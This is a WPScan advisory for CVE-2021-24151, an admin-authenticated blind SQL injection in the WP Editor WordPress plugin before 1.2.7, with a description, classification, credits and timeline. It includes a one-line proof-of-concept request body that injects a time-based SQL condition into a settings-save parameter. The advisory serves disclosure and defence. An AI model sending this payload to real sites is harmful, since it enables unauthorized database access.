WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Editor < 1.2.7 - Authenticated SQL injection

Description

The plugin did not sanitise or validate its setting fields leading to an authenticated (admin+) blind SQL injection issue via an arbitrary parameter when making a request to save the settings.

Proof of Concept

https://drive.google.com/file/d/1KT4lHePmYuX3_6jvA4AEQ1MVDwJBlZOO/view?usp=sharing


payload: wp_editor_ajax_nonce_settings_main=bfcfabefa8&action=save_wpeditor_settings&submit=Save%20Settings&cm0s'/**/or/**/sleep(1)%23=cm0s

Affects Plugins

wp-editor
Fixed in version 1.2.7

References

CVE
CVE-2021-24151

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website
http://research.sun-asterisk.com/
Verified

Yes

WPVDB ID
5ee77dd7-5a73-4d4e-8038-23e6e763e20c

Timeline

Publicly Published

2021-02-01 (about 2 years ago)

Added

2021-02-01 (about 2 years ago)

Last Updated

2021-02-02 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin